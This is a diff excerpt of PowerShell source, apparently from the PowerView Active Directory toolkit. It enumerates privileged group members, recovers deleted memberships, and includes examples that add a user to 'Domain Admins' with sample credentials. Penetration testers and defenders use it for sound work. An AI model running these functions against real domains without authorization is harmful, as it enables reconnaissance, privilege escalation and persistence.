+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGroupMember "Desktop Admins"
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+'Desktop Admins' | Get-DomainGroupMember -Recurse
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Testing Group
+GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+.EXAMPLE
+
+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
+
+.EXAMPLE
+
+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
+
+.EXAMPLE
+
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+'dev\domain admins' | Get-DomainGroupMember -Verbose
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
+
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain
Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : user1
+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108
+
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : Administrator
+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-500
+
+.OUTPUTS
+
+PowerView.GroupMember
+
+Custom PSObject with translated group member property fields.
+
+.LINK
+
+http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.GroupMember')]
+ [CmdletBinding(DefaultParameterSetName = 'None')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [Parameter(ParameterSetName = 'ManualRecurse')]
+ [Switch]
+ $Recurse,
+
+ [Parameter(ParameterSetName = 'RecurseUsingMatchingRule')]
+ [Switch]
+ $RecurseUsingMatchingRule,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+
$SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'member,samaccountname,distinguishedname'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $ADNameArguments = @{}
+ if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
+ }
+
+ PROCESS {
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ if ($GroupSearcher) {
+ if ($PSBoundParameters['RecurseUsingMatchingRule']) {
+ $SearcherArguments['Identity'] = $Identity
+ $SearcherArguments['Raw'] =
$True
+ $Group = Get-DomainGroup @SearcherArguments
+
+ if (-not $Group) {
+ Write-Warning "[Get-DomainGroupMember] Error searching for group with identity: $Identity"
+ }
+ else {
+ $GroupFoundName = $Group.properties.item('samaccountname')[0]
+ $GroupFoundDN = $Group.properties.item('distinguishedname')[0]
+
+ if ($PSBoundParameters['Domain']) {
+ $GroupFoundDomain = $Domain
+ }
+ else {
+ # if a domain isn't passed, try to extract it from the found group distinguished name
+ if ($GroupFoundDN) {
+ $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ }
+ Write-Verbose "[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', only user accounts will be returned."
+ $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))"
+ $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName'))
+ $Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]}
+ }
+ $Null = $SearcherArguments.Remove('Raw')
+ }
+ else {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^CN=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainGroupMember] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $GroupSearcher) {
+ Write-Warning "[Get-DomainGroupMember] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('\')) {
+ $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentityInstance) {
+ $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+ $GroupName = $IdentityInstance.Split('\')[1]
+ $IdentityFilter += "(samAccountName=$GroupName)"
+ $SearcherArguments['Domain'] = $GroupDomain
+ Write-Verbose "[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'"
+ $GroupSearcher = Get-DomainSearcher @SearcherArguments
+ }
+ }
+ else {
+ $IdentityFilter += "(samAccountName=$IdentityInstance)"
+ }
+ }
+
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
+
+ $GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
+ Write-Verbose "[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)"
+ try {
+ $Result = $GroupSearcher.FindOne()
+ }
+ catch {
+ Write-Warning "[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_"
+ $Members = @()
+ }
+
+ $GroupFoundName = ''
+ $GroupFoundDN = ''
+
+ if ($Result) {
+ $Members =
$Result.properties.item('member')
+
+ if ($Members.count -eq 0) {
+ # ranged searching, thanks @meatballs__ !
+ $Finished = $False
+ $Bottom = 0
+ $Top = 0
+
+ while (-not $Finished) {
+ $Top = $Bottom + 1499
+ $MemberRange="member;range=$Bottom-$Top"
+ $Bottom += 1500
+ $Null = $GroupSearcher.PropertiesToLoad.Clear()
+ $Null = $GroupSearcher.PropertiesToLoad.Add("$MemberRange")
+ $Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname')
+ $Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname')
+
+ try {
+ $Result = $GroupSearcher.FindOne()
+ $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*"
+ $Members += $Result.Properties.item($RangedProperty)
+ $GroupFoundName = $Result.properties.item('samaccountname')[0]
+ $GroupFoundDN = $Result.properties.item('distinguishedname')[0]
+
+ if ($Members.count -eq 0) {
+ $Finished = $True
+ }
+ }
+ catch [System.Management.Automation.MethodInvocationException] {
+ $Finished = $True
+ }
+ }
+ }
+ else {
+ $GroupFoundName = $Result.properties.item('samaccountname')[0]
+ $GroupFoundDN = $Result.properties.item('distinguishedname')[0]
+ $Members += $Result.Properties.item($RangedProperty)
+ }
+
+ if ($PSBoundParameters['Domain']) {
+ $GroupFoundDomain = $Domain
+ }
+ else {
+ # if a domain isn't passed, try to extract it from the found group distinguished name
+ if ($GroupFoundDN) {
+ $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ }
+ }
+ }
+
+ ForEach ($Member in $Members) {
+ if ($Recurse -and $UseMatchingRule) {
+ $Properties = $_.Properties
+ }
+ else {
+ $ObjectSearcherArguments = $SearcherArguments.Clone()
+ $ObjectSearcherArguments['Identity'] = $Member
+ $ObjectSearcherArguments['Raw'] = $True
+ $ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass'
+ $Object = Get-DomainObject @ObjectSearcherArguments
+ $Properties = $Object.Properties
+ }
+
+ if ($Properties) {
+ $GroupMember = New-Object PSObject
+ $GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain
+ $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName
+ $GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN
+
+ if ($Properties.objectsid) {
+ $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value)
+ }
+ else {
+ $MemberSID = $Null
+ }
+
+ try {
+ $MemberDN = $Properties.distinguishedname[0]
+ if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') {
+ try {
+ if (-not $MemberSID) {
+ $MemberSID = $Properties.cn[0]
+ }
+ $MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments
+
+ if ($MemberSimpleName) {
+ $MemberDomain = $MemberSimpleName.Split('@')[1]
+ }
+ else {
+ Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
+ $MemberDomain = $Null
+ }
+ }
+ catch {
+ Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
+ $MemberDomain = $Null
+ }
+ }
+ else {
+ # extract the FQDN from the Distinguished Name
+ $MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ }
+ catch {
+ $MemberDN = $Null
+ $MemberDomain = $Null
+ }
+
+ if ($Properties.samaccountname) {
+ # forest users have the samAccountName set
+ $MemberName = $Properties.samaccountname[0]
+ }
+ else {
+ # external trust users have a SID, so convert it
+ try {
+ $MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments
+ }
+ catch {
+ # if there's a problem contacting the domain to resolve the SID
+ $MemberName = $Properties.cn[0]
+ }
+ }
+
+ if ($Properties.objectclass -match 'computer') {
+ $MemberObjectClass = 'computer'
+ }
+ elseif ($Properties.objectclass -match 'group') {
+ $MemberObjectClass = 'group'
+ }
+ elseif ($Properties.objectclass -match 'user') {
+ $MemberObjectClass = 'user'
+ }
+ else {
+ $MemberObjectClass = $Null
+ }
+ $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
+ $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName
+ $GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN
+ $GroupMember | Add-Member Noteproperty 'MemberObjectClass' $MemberObjectClass
+ $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID
+ $GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember')
+ $GroupMember
+
+ # if we're doing manual recursion
+ if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) {
+ Write-Verbose "[Get-DomainGroupMember] Manually recursing on group: $MemberDN"
+ $SearcherArguments['Identity'] = $MemberDN
+ $Null = $SearcherArguments.Remove('Properties')
+ Get-DomainGroupMember @SearcherArguments
+ }
+ }
+ }
+ $GroupSearcher.dispose()
+ }
+ }
+}
+
+
+function Get-DomainGroupMemberDeleted {
+<#
+.SYNOPSIS
+
+Returns information on group members that were removed from the specified
+group identity. Accomplished by searching the linked attribute replication
+metadata for the group using Get-DomainObjectLinkedAttributeHistory.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectLinkedAttributeHistory
+
+.DESCRIPTION
+
+Wraps Get-DomainObjectLinkedAttributeHistory to return the linked attribute
+replication metadata for the specified group. These are cases where the
+'Version' attribute of group member in the replication metadata is even.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGroupMemberDeleted | Group-Object GroupDN
+
+Count Name Group
+----- ---- -----
+ 2 CN=Domain Admins,CN=Us... {@{GroupDN=CN=Domain Admins,CN=Users,DC=test...
+ 3 CN=DomainLocalGroup,CN... {@{GroupDN=CN=DomainLocalGroup,CN=Users,DC=t...
+
+.EXAMPLE
+
+Get-DomainGroupMemberDeleted "Domain Admins" -Domain testlab.local
+
+
+GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
+MemberDN : CN=testuser,CN=Users,DC=testlab,DC=local
+TimeFirstAdded : 2017-06-13T23:07:43Z
+TimeDeleted : 2017-06-13T23:26:17Z
+LastOriginatingChange : 2017-06-13T23:26:17Z
+TimesAdded : 2
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
+MemberDN : CN=dfm,CN=Users,DC=testlab,DC=local
+TimeFirstAdded : 2017-06-13T22:20:02Z
+TimeDeleted : 2017-06-13T23:26:17Z
+LastOriginatingChange : 2017-06-13T23:26:17Z
+TimesAdded : 5
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+.OUTPUTS
+
+PowerView.DomainGroupMemberDeleted
+
+Custom PSObject with translated replication metadata fields.
+
+.LINK
+
+https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.DomainGroupMemberDeleted')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+
$ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'msds-replvaluemetadata','distinguishedname'
+ 'Raw' = $True
+ 'LDAPFilter' = '(objectCategory=group)'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ $ObjectDN = $_.Properties['distinguishedname'][0]
+ ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {
+ $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue
+ if ($TempObject) {
+ if (($TempObject.pszAttributeName -Match 'member') -and (($TempObject.dwVersion % 2) -eq 0 )) {
+ $Output = New-Object PSObject
+ $Output | Add-Member NoteProperty 'GroupDN' $ObjectDN
+ $Output | Add-Member NoteProperty 'MemberDN' $TempObject.pszObjectDn
+ $Output | Add-Member NoteProperty 'TimeFirstAdded' $TempObject.ftimeCreated
+ $Output | Add-Member NoteProperty
'TimeDeleted' $TempObject.ftimeDeleted
+ $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
+ $Output | Add-Member NoteProperty 'TimesAdded' ($TempObject.dwVersion / 2)
+ $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted')
+ $Output
+ }
+ }
+ else {
+ Write-Verbose "[Get-DomainGroupMemberDeleted] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'"
+ }
+ }
+ }
+ }
+}
+
+
+function Add-DomainGroupMember {
+<#
+.SYNOPSIS
+
+Adds a domain user (or group) to an existing domain group, assuming
+appropriate permissions to do so.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+.DESCRIPTION
+
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified -GroupIdentity,
+which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For
+each entry in -Members, each member identity is similarly searched for and added
+to the group.
+
+.PARAMETER Identity
+
+A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to add members to.
+
+.PARAMETER Members
+
+One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName
+(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114),
+or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
+
+.PARAMETER Domain
+
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
+
+Adds harmj0y to 'Domain Admins' in the current domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
+
+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+.LINK
+
+http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True)]
+ [Alias('GroupName', 'GroupIdentity')]
+ [String]
+ $Identity,
+
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('MemberIdentity', 'Member', 'DistinguishedName')]
+ [String[]]
+ $Members,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $ContextArguments = @{
+ 'Identity' = $Identity
+ }
+ if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
+
+ $GroupContext = Get-PrincipalContext @ContextArguments
+
+ if ($GroupContext) {
+ try {
+ $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity)
+ }
+ catch {
+ Write-Warning "[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_"
+ }
+ }
+ }
+
+ PROCESS {
+ if ($Group) {
+ ForEach ($Member in $Members) {
+ if ($Member -match '.+\\.+') {
+ $ContextArguments['Identity'] = $Member
+ $UserContext = Get-PrincipalContext @ContextArguments
+ if ($UserContext) {
+ $UserIdentity = $UserContext.Identity
+ }
+ }
+ else {
+ $UserContext = $GroupContext
+ $UserIdentity = $Member
+ }
+ Write-Verbose "[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'"
+ $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity)
+ $Group.Members.Add($Member)
+ $Group.Save()
+ }
+ }
+ }
+}
+
+
+function Remove-DomainGroupMember {
+<#
+.SYNOPSIS
+
